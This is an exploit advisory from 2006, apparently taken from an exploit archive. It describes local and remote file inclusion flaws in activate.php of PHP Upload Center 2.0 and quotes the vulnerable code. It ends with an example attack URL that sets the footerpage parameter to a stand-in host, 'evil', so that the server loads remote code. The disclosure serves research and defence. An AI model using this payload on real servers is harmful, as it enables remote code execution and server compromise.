id: 1231
date: 12/03/2006
title: PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities
author: GregStar
cves: 

=================================================================
PHP Upload Center 2.0 (activate.php) File Include Vulnerabilities
=================================================================



*************************************************************************************************************************
                                                              					          		 
			               			 Coding 4 Fun     						 
			                                      						  		 
*************************************************************************************************************************
													  		 
* Name = PHP Upload Center v2.0 ; 											 
													  		 
* Class = Remote/Local File Inclusion ;											 
																			          		 												  	  		 
-------------------------------------------------------------------------------------------------------------------------
													  		 
Vulnerable Code in activate.php												 
															 
line 66-70														 
															 
...															 
															 
 if (!isset($language))													 
  $language=$dft_language;												 
if ($language=="")													 
  $language=$dft_language;												 
require("include/${language}.php"); <== Local incl.								 
															 
...															 
	

line 164

...

include($footerpage);  <== Remote incl.

...


Code in include/en.php (and other language files)

line 5-7

...

$headerpage="include/header.htm";
$footerpage="include/footer.htm"; <==
$infopage="include/info.htm";

...

												  		 
- Ex. :	

  														 
 http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?								 
															 
															 
															 
															 
*************************************************************************************************************************
Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n,java,reyw,kw@ch.	  		 												          		 
*************************************************************************************************************************



#  0day.today [2023-03-25]  #